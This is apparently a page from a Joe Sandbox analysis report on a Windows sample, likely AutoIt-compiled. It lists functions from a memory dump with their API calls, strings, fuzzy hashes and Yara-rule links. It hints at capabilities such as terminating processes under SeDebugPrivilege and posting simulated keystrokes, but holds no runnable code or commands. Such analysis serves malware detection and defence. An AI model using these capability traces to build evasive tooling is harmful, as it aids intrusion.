Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ad036ef2a674b133d9e6c9f0dcd71969ac0b21cae9a7fe045e84b592f27122b7
Instruction ID: 12ff3447b8281cccd7df78f3296bb37b83eb743e4c5f3b1cad821e69b37e12d3
Opcode Fuzzy Hash: ad036ef2a674b133d9e6c9f0dcd71969ac0b21cae9a7fe045e84b592f27122b7
Instruction Fuzzy Hash: 2B51B438662205BFEF24BF24CC89B997B64AB05310F944516F914D71E2CF71A9B0DF50

Function 00202F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0023C638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0023C65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0023C672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0023C690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0023C6B1
DestroyIcon.USER32(00000000), ref: 0023C6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0023C6DD
DestroyIcon.USER32(?), ref: 0023C6EC

Part of subcall function 0028AAD4: DeleteObject.GDI32(00000000), ref: 0028AB0D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 6bfe42abb2cfcce2c68db06d99c597f5d7c34b9a813371a5cbcf030a2dfcd869
Instruction ID: f54797b7d8b196dbdc6bdbdf5c084ca0f35f6041d5f3e9324c4c74c2b2acb461
Opcode Fuzzy Hash: 6bfe42abb2cfcce2c68db06d99c597f5d7c34b9a813371a5cbcf030a2dfcd869
Instruction Fuzzy Hash: E1516B7062030AEFDB24DF24DC49BAA77B9EB44750F20451AF946A76D0DB70ACA0DF50

Function 0025A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0025B54D
Part of subcall function 0025B52D: GetCurrentThreadId.KERNEL32 ref: 0025B554
Part of subcall function 0025B52D: AttachThreadInput.USER32(00000000,?,0025A23B,?,00000001), ref: 0025B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 0025A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0025A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0025A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 0025A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0025A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0025A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 0025A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0025A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0025A2B3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 848d43d5afdc039e70b1d8ffdb2516d101b67095ed597941a9d5bc056947869a
Instruction ID: 63fc10a5d483a7862cecd7a85955bab77ff32ebf6e5e920b2f4fa3b1fd181579
Opcode Fuzzy Hash: 848d43d5afdc039e70b1d8ffdb2516d101b67095ed597941a9d5bc056947869a
Instruction Fuzzy Hash: 5711A571950618BEF6106F60EC8EF6A7B2DDB4C751F510416FB546B0D0CAF36C609AA4

Function 002594D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0025915A,00000B00,?,?), ref: 002594E2
HeapAlloc.KERNEL32(00000000,?,0025915A,00000B00,?,?), ref: 002594E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0025915A,00000B00,?,?), ref: 002594FE
GetCurrentProcess.KERNEL32(?,00000000,?,0025915A,00000B00,?,?), ref: 00259506
DuplicateHandle.KERNEL32(00000000,?,0025915A,00000B00,?,?), ref: 00259509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0025915A,00000B00,?,?), ref: 00259519
GetCurrentProcess.KERNEL32(0025915A,00000000,?,0025915A,00000B00,?,?), ref: 00259521
DuplicateHandle.KERNEL32(00000000,?,0025915A,00000B00,?,?), ref: 00259524
CreateThread.KERNEL32(00000000,00000000,0025954A,00000000,00000000,00000000), ref: 0025953E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 11c5690a8d3c5897df88fd8372e56c3d91d177a6b1ac54a5be5cf07cfbf5c224
Instruction ID: 32504788270094189ca0cb528327ea46c482c24dcebea7aaa1c4376648c40484
Opcode Fuzzy Hash: 11c5690a8d3c5897df88fd8372e56c3d91d177a6b1ac54a5be5cf07cfbf5c224
Instruction Fuzzy Hash: DB01C275640308BFE710AFA5EC8DF6B7B6CEB89711F404412FA05DB1A1D6709814CB24

Function 0027A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0027A28E, 0027A5B2
Not an Object type, xrefs: 0027A265

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: da569815b51462472a5939949ae27f78da46f33fb6f95f7aa84c25b8f063b210
Instruction ID: d14dbaed0c83582cdc9f22827cbfa82fe6693a712e47bd5090d63c83ea31fc08
Opcode Fuzzy Hash: da569815b51462472a5939949ae27f78da46f33fb6f95f7aa84c25b8f063b210
Instruction Fuzzy Hash: 0CC1B371E2021A9FDF10CFA8D885AAEB7F5FB88324F14C469E909A7281E770DD54CB51

Function 002797FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00279851
VariantInit.OLEAUT32(?), ref: 00279922
VariantInit.OLEAUT32(?), ref: 00279A23
VariantClear.OLEAUT32(?), ref: 00279A2D
VariantClear.OLEAUT32(?), ref: 00279A8A

Strings

Null Object assignment in FOR..IN loop, xrefs: 002798B2, 002799E0, 00279A98
Incorrect Object type in FOR..IN loop, xrefs: 00279A06

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 2e864755300f8ceeeea4088b92801bc627a18854cf17720dc4228f3b531557a8
Instruction ID: e3760b9b037ecfd4d2391587e86c3eec9f64d569dcfcd9e278db4c81ce6feb82
Opcode Fuzzy Hash: 2e864755300f8ceeeea4088b92801bc627a18854cf17720dc4228f3b531557a8
Instruction Fuzzy Hash: A4918D71A2031AAFDF20CFA5C848FAEB7B8EF45710F10855DE519AB240D7709990CFA0

Function 00279E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00257D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?,?,?,00258073), ref: 00257D45
Part of subcall function 00257D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?,?), ref: 00257D60
Part of subcall function 00257D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?,?), ref: 00257D6E
Part of subcall function 00257D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?), ref: 00257D7E

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00279EF0
_memset.LIBCMT ref: 00279EFD
_memset.LIBCMT ref: 0027A040
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0027A06C
CoTaskMemFree.OLE32(?), ref: 0027A077

Strings

NULL Pointer assignment, xrefs: 0027A0C5

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 1600447b463d4c756fe6114823ecdafe6d6d14824243cd79307d0d6ce0734bb6
Instruction ID: ff8d5887d7de8c9f735192d5707b5aaf7bb650d8c2a6ea9f190598bc1183971c
Opcode Fuzzy Hash: 1600447b463d4c756fe6114823ecdafe6d6d14824243cd79307d0d6ce0734bb6
Instruction Fuzzy Hash: A6914871D10229EBDB20DFA4D885EDEBBB8FF08310F10815AF519A7241DB719A64CFA1

Function 002873A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00287449
SendMessageW.USER32(?,00001036,00000000,?), ref: 0028745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00287477
_wcscat.LIBCMT ref: 002874D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 002874E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00287517

Strings

SysListView32, xrefs: 0028741B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 2cfe0f54e070ace502f9210e894ded7a213ae2db154b2720bcca36b88990bdbb
Instruction ID: 098eb0227c9a2612a9b6c59bbd843f4e9ff2bab14e287b3e23c66fd54c3d55c0
Opcode Fuzzy Hash: 2cfe0f54e070ace502f9210e894ded7a213ae2db154b2720bcca36b88990bdbb
Instruction Fuzzy Hash: F041B075A14309AFEB21AF64CC85BEEB7B8EF08350F20446AF984A71D1D771DDA48B50

Function 0027F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00264148: CreateToolhelp32Snapshot.KERNEL32 ref: 0026416D
Part of subcall function 00264148: Process32FirstW.KERNEL32(00000000,?), ref: 0026417B
Part of subcall function 00264148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00264245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0027F08D
GetLastError.KERNEL32 ref: 0027F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0027F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 0027F14C
GetLastError.KERNEL32(00000000), ref: 0027F157
CloseHandle.KERNEL32(00000000), ref: 0027F18C

Strings

SeDebugPrivilege, xrefs: 0027F0AB

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 97cceae913e78f80e0577493ae43063699b90b02f3db1bdea205ccc1b1e51ad3
Instruction ID: d0290640e21a5376a36cbbef3dc9000a40560e25cc411dc145d169f9f53d4f53
Opcode Fuzzy Hash: 97cceae913e78f80e0577493ae43063699b90b02f3db1bdea205ccc1b1e51ad3
Instruction Fuzzy Hash: 0B41CA712243029FDB11EF24DC95F6DB7A0AF80314F44C059F90A9B2C2CBB0A924CF99

Function 002647E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00264802
LoadStringW.USER32(00000000), ref: 00264809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0026481F
LoadStringW.USER32(00000000), ref: 00264826
_wprintf.LIBCMT ref: 0026484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0026486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00264847

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 5907659e86c3bc7286686e40165ac94127e3634abeb6fdd0e1cc96397849c7ef
Instruction ID: 4d0893be2616b62a245a8a1a8805a1f8fa3af7c4176455aebb7d981214fd419f
Opcode Fuzzy Hash: 5907659e86c3bc7286686e40165ac94127e3634abeb6fdd0e1cc96397849c7ef
Instruction Fuzzy Hash: DF0162F291020C7FE751ABA4ADCDEF6736CEB08300F4005A6BB49E2041EB749E944B75

Function 0028DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

GetSystemMetrics.USER32(0000000F), ref: 0028DB42
GetSystemMetrics.USER32(0000000F), ref: 0028DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0028DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0028DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0028DDDC
ShowWindow.USER32(00000003,00000000), ref: 0028DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 0028DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 0028DE43

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: e6f8896811bf24db8a9c12bfae7a7d6c459c241f65a40ffa5ae923ad7381a16d
Instruction ID: e9609578cfabe3a56dba7c273dcc13aece0c12c80f576375c397caf0efdbd5f8
Opcode Fuzzy Hash: e6f8896811bf24db8a9c12bfae7a7d6c459c241f65a40ffa5ae923ad7381a16d
Instruction Fuzzy Hash: 9EB19A3960121AEFDF14DF69C9C9BAD7BB1BF04701F08806AED489E2D5D770A964CB90

Function 00280371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0028147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028040D,?,?), ref: 00281491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028044E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 4c4aa4975a337ba208f84032dce56980e44b15eb2b4cfa3e34d6c8e79c541ef7
Instruction ID: f841a6f627fd95c5b738a2819b2bd674c1f3fba31f4dcbc63357d10235159ff4
Opcode Fuzzy Hash: 4c4aa4975a337ba208f84032dce56980e44b15eb2b4cfa3e34d6c8e79c541ef7
Instruction Fuzzy Hash: FBA19B702242019FCB50EF24C885F6EB7E4BF84314F14891DF996972A2DB35E969CF46

Function 00202E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0023C508,00000004,00000000,00000000,00000000), ref: 00202E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0023C508,00000004,00000000,00000000,00000000,000000FF), ref: 00202EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0023C508,00000004,00000000,00000000,00000000), ref: 0023C55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0023C508,00000004,00000000,00000000,00000000), ref: 0023C5C7

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3b7dacae90a3dd864857035fffd1bae7d9252ff21ccc9a21cbc37193c5c9f02a
Instruction ID: 1de3963e720fed2bb8eeb1f4f33ede15b37e56a4cc18a2729c5bae72e6355c49
Opcode Fuzzy Hash: 3b7dacae90a3dd864857035fffd1bae7d9252ff21ccc9a21cbc37193c5c9f02a
Instruction Fuzzy Hash: 1241D470674785DEC7368F28DCCCA6BBAE2AB85314F64440FE447625E2C7B1B868DB10

Function 00267681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00267698

Part of subcall function 00220FE6: std::exception::exception.LIBCMT ref: 0022101C
Part of subcall function 00220FE6: __CxxThrowException@8.LIBCMT ref: 00221031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002676CF
EnterCriticalSection.KERNEL32(?), ref: 002676EB
_memmove.LIBCMT ref: 00267739
_memmove.LIBCMT ref: 00267756
LeaveCriticalSection.KERNEL32(?), ref: 00267765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0026777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00267799

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 1c44dd0c6b1a008627f5f12c6a5c9ec86ab8218ac622eed208c055ccb28a8ed0
Instruction ID: 0742b624bff009e9d936e60476f0495b9255983394243f090026d9a9fdd3d2f8
Opcode Fuzzy Hash: 1c44dd0c6b1a008627f5f12c6a5c9ec86ab8218ac622eed208c055ccb28a8ed0
Instruction Fuzzy Hash: 4A318331914119FFCB10DF94EC89EAEB778EF45300B1440A6FD04AB256DB309E60CB60

Function 002867F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00286810
GetDC.USER32(00000000), ref: 00286818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00286823
ReleaseDC.USER32(00000000,00000000), ref: 0028682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0028686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0028687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0028964F,?,?,000000FF,00000000,?,000000FF,?), ref: 002868B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002868D6

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: da4c6bd87b50f42c15868d991edc90a9120e6cd8c0f21846bb7e378e505fbe62
Instruction ID: 5915913972173bbb215365fdf84a1a573576841b12e8145c0701ca02fcc301dc
Opcode Fuzzy Hash: da4c6bd87b50f42c15868d991edc90a9120e6cd8c0f21846bb7e378e505fbe62
Instruction Fuzzy Hash: 4B318976201214BFEB119F10DC8AFEA3BADEF49761F040066FE08AA291C7759C51CBB4

Function 0025C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0025C75D
_memcmp.LIBCMT ref: 0025C77F
_memcmp.LIBCMT ref: 0025C797
_memcmp.LIBCMT ref: 0025C7AA
_memcmp.LIBCMT ref: 0025C7C4
_memcmp.LIBCMT ref: 0025C7D7
_memcmp.LIBCMT ref: 0025C7EF
_memcmp.LIBCMT ref: 0025C80A

